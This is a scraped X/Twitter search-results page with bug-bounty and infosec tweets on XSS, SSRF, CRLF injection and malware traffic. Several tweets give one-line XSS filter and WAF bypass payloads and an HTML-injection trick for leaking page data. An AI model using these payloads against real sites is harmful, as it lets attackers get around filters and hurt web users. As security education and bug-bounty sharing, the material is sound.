Tiếng Việt
English Indonesia Türkçe Deutsch Español Português Pусский Français Italiano Nederlands Polski العربية ไทย Tiếng Việt 繁體中文 简体中文 日本語 한국어

#securecodingagainsthttpresponsesplitting kết quả tìm kiếm

Không có kết quả nào cho "#securecodingagainsthttpresponsesplitting"
Không có kết quả nào cho "#securecodingagainsthttpresponsesplitting"
Không có kết quả nào cho "#securecodingagainsthttpresponsesplitting"
infosec_au's profile picture. Co-founder, security researcher. Building an attack surface management platform, @assetnote
shubs
@infosec_au
23 thg 6

How do we turn bad SSRF (blind) into good SSRF (full response)? The @assetnote Security Research team at @SLCyberSec used a novel technique involving HTTP redirect loops and incremental status codes that leaked the full HTTP resp. It may work elsewhere! slcyber.io/assetnote-secu…

infosec_au's tweet image. How do we turn bad SSRF (blind) into good SSRF (full response)? The @assetnote Security Research team at @SLCyberSec used a novel technique involving HTTP redirect loops and incremental status codes that leaked the full HTTP resp. It may work elsewhere! slcyber.io/assetnote-secu…
6
178
623
423
41K
therceman's profile picture. 👋 I’m Anton (therceman) 🪲 Bug Bounty Hunter 💰 📖 Bug Bounty Book - https://t.co/Y9nGrZydBV
Anton
@therceman
28 thg 11, 2021

Bug Bounty Tip :: HTML Injection - Information Disclosure Hijack information from a page using <img> tag with unclosed "src" attr #CyberSecurity #cybersecuritytips #Hacking #BugBounty #bugbountytip #infosec #hacker #togetherwehitharder #bugcrowd #hack #hackers #hackerone

therceman's tweet image. Bug Bounty Tip :: HTML Injection - Information Disclosure Hijack information from a page using &amp;lt;img&amp;gt; tag with unclosed &quot;src&quot; attr #CyberSecurity #cybersecuritytips #Hacking #BugBounty #bugbountytip #infosec #hacker #togetherwehitharder #bugcrowd #hack #hackers #hackerone
1
108
249
58
0
19whoami19's profile picture. Penetration Tester and Bug Bounty Hunter since 2023 with 70+ Halls of Fame
Who Am I ? 🇪🇬 🇵🇸
 @19whoami19
18 giờ

Old Cloudflare XSS bypass but still works . . <img alt="<x" title="/><img src=x onerror=alert(6)>">

19whoami19's tweet image. Old Cloudflare XSS bypass but still works . . &amp;lt;img alt=&quot;&amp;lt;x&quot; title=&quot;/&amp;gt;&amp;lt;img src=x onerror=alert(6)&amp;gt;&quot;&amp;gt;
3
52
390
256
11K
therceman's profile picture. 👋 I’m Anton (therceman) 🪲 Bug Bounty Hunter 💰 📖 Bug Bounty Book - https://t.co/Y9nGrZydBV
Anton
@therceman
17 thg 9, 2023

Bug Bounty Tip Always check different encodings for your XSS payload. For example: ?q=<img src onerror=alert(1)> ?q=\u003cimg src onerror=alert(1)\u003e There might be a filter that removes <>, but not unicode symbols \u003c \u003e. Cheers!

therceman's tweet image. Bug Bounty Tip Always check different encodings for your XSS payload. For example: ?q=&amp;lt;img src onerror=alert(1)&amp;gt; ?q=\u003cimg src onerror=alert(1)\u003e There might be a filter that removes &amp;lt;&amp;gt;, but not unicode symbols \u003c \u003e. Cheers!
4
97
406
158
35K
0x0SojalSec's profile picture. Cyber_Security_Re-searcher || 0SINT || Malware Analysis II Pwn || Ai Re-searcher || Project AI-StrikeSec || 0ld Accounts Suspended @0xSojalSec ||
Md Ismail Šojal 🕷️
 @0x0SojalSec
31 thg 12, 2022

Bug Bounty Hint⚔️🛡️ File Upload Extension Splitting Cheat Sheet : #infosecurity #cybersecurite #bugbountytips

0x0SojalSec's tweet image. Bug Bounty Hint⚔️🛡️ File Upload Extension Splitting Cheat Sheet : #infosecurity #cybersecurite #bugbountytips
3
82
266
80
15K
naumovax's profile picture. pt malicious network traffic researcher, speaker / this blog about new malware & interesting С2 communication & my work life
Kseniia \n
 @naumovax
14 thg 10

Don't trust the Host header in HTTP, firstly - check DNS 🧐 Here #ACRStealer mimics @Bitdefender (indicates the official website in this POST request, but the real IP is different) 🦎 C2: 87.120.219[.]223 tria.ge/251014-qd8j9aa… virustotal.com/gui/file/83b63… #stealer

naumovax's tweet image. Don&apos;t trust the Host header in HTTP, firstly - check DNS 🧐 Here #ACRStealer mimics @Bitdefender (indicates the official website in this POST request, but the real IP is different) 🦎 C2: 87.120.219[.]223 tria.ge/251014-qd8j9aa… virustotal.com/gui/file/83b63… #stealer
3
33
189
76
13K
0x0SojalSec's profile picture. Cyber_Security_Re-searcher || 0SINT || Malware Analysis II Pwn || Ai Re-searcher || Project AI-StrikeSec || 0ld Accounts Suspended @0xSojalSec ||
Md Ismail Šojal 🕷️
 @0x0SojalSec
9 thg 1, 2023

XSS: Arithmetic Operators & Optional Chaining To Bypass Filters & Sanitization secjuice.com/xss-arithmetic… #infosec #XSS #cybersec #bugbountytips

0x0SojalSec's tweet image. XSS: Arithmetic Operators &amp;amp; Optional Chaining To Bypass Filters &amp;amp; Sanitization secjuice.com/xss-arithmetic… #infosec #XSS #cybersec #bugbountytips
2
113
360
107
23K
TakSec's profile picture. AI Red Team | Bug Bounty Hunter | Pentester
Mike Takahashi
@TakSec
2 thg 11, 2019

XSS filter bypass using stripped </div> tags to obfuscate. Multiple P2 Stored XSS on a private bug bounty program. XSS Payload: <</div>script</div>>alert()<</div>/script</div>> #BugBountyTips #bugbounty #xss @brutelogic

TakSec's tweet image. XSS filter bypass using stripped &amp;lt;/div&amp;gt; tags to obfuscate. Multiple P2 Stored XSS on a private bug bounty program. XSS Payload: &amp;lt;&amp;lt;/div&amp;gt;script&amp;lt;/div&amp;gt;&amp;gt;alert()&amp;lt;&amp;lt;/div&amp;gt;/script&amp;lt;/div&amp;gt;&amp;gt; #BugBountyTips #bugbounty #xss @brutelogic
5
242
585
102
0
0x0SojalSec's profile picture. Cyber_Security_Re-searcher || 0SINT || Malware Analysis II Pwn || Ai Re-searcher || Project AI-StrikeSec || 0ld Accounts Suspended @0xSojalSec ||
Md Ismail Šojal 🕷️
 @0x0SojalSec
12 thg 2, 2023

how to use encodings in <a>. what symbols in which points you can inject to bypass WAF, filters, sanitizers. ⚔️ gist.github.com/0xSojalSec/461… #infosec #CyberSecurity #bugbountytips

0x0SojalSec's tweet image. how to use encodings in &amp;lt;a&amp;gt;. what symbols in which points you can inject to bypass WAF, filters, sanitizers. ⚔️ gist.github.com/0xSojalSec/461… #infosec #CyberSecurity #bugbountytips
2
138
376
88
20K
0xJin's profile picture. ¯\\_(ツ)_/¯ | CPTS | OSCP | OSWP | CISM |eCPTX | eWPTX | eJPT | C|EH Master | Engineers Degree | 👾 | 💻Box Creator Vulnhub - Offsec “N0t0d4y”
N0t0d4y
 @0xJin
22 thg 10, 2021

My new XSS Bypass Filter! "/><svg+svg+svg\/\/On+OnLoAd=confirm(1)> Please let me know if some researcher found this before me in the comments! Thank you :) And happy hacking! #bugbounty #bugbountytips #0day #exploit #xss #hacking #hackers #bugs

0xJin's tweet image. My new XSS Bypass Filter! &quot;/&amp;gt;&amp;lt;svg+svg+svg\/\/On+OnLoAd=confirm(1)&amp;gt; Please let me know if some researcher found this before me in the comments! Thank you :) And happy hacking! #bugbounty #bugbountytips #0day #exploit #xss #hacking #hackers #bugs
10
227
578
165
0
SecurityTrybe's profile picture. Cybersecurity & Tech | https://t.co/NIuxWOtJYz
Security Trybe
@SecurityTrybe
31 thg 7, 2023

A Bird’s Eye View of Defense-in-Depth Structure of Cybersecurity

SecurityTrybe's tweet image. A Bird’s Eye View of Defense-in-Depth Structure of Cybersecurity
1
107
260
83
24K
hack_git's profile picture. The channel was created for cybersecurity specialists 🥷 → Open Source Software → RedTeam → BugBounty → etc 🍻 https://t.co/0PYtBpfJ4f
HackGit
 @hack_git
21 thg 10, 2023

CRLFsuite The most powerful CRLF injection (HTTP Response Splitting) scanner. github.com/Raghavd3v/CRLF… #cybersecurity #infosec #pentesting #bugbounty

hack_git's tweet image. CRLFsuite The most powerful CRLF injection (HTTP Response Splitting) scanner. github.com/Raghavd3v/CRLF… #cybersecurity #infosec #pentesting #bugbounty
0
88
266
100
22K
TakSec's profile picture. AI Red Team | Bug Bounty Hunter | Pentester
Mike Takahashi
@TakSec
8 thg 11, 2019

XSS on a login page while stuck in an input tag with <> filtered. Final Payload: " formaction=java%26Tab%3bscript:ale%26Tab%3brt() type=image src="" Also gets around "javascript" and "alert" blacklist with html entity Tab obfuscation. #BugBountyTips #bugbounty #XSS

TakSec's tweet image. XSS on a login page while stuck in an input tag with &amp;lt;&amp;gt; filtered. Final Payload: &quot; formaction=java%26Tab%3bscript:ale%26Tab%3brt() type=image src=&quot;&quot; Also gets around &quot;javascript&quot; and &quot;alert&quot; blacklist with html entity Tab obfuscation. #BugBountyTips #bugbounty #XSS
1
131
333
59
0
SecurityTrybe's profile picture. Cybersecurity & Tech | https://t.co/NIuxWOtJYz
Security Trybe
@SecurityTrybe
9 thg 1, 2024

Defense-in-Depth Structure of Cybersecurity

SecurityTrybe's tweet image. Defense-in-Depth Structure of Cybersecurity
0
104
311
101
19K

Something went wrong.


Something went wrong.


United States Trends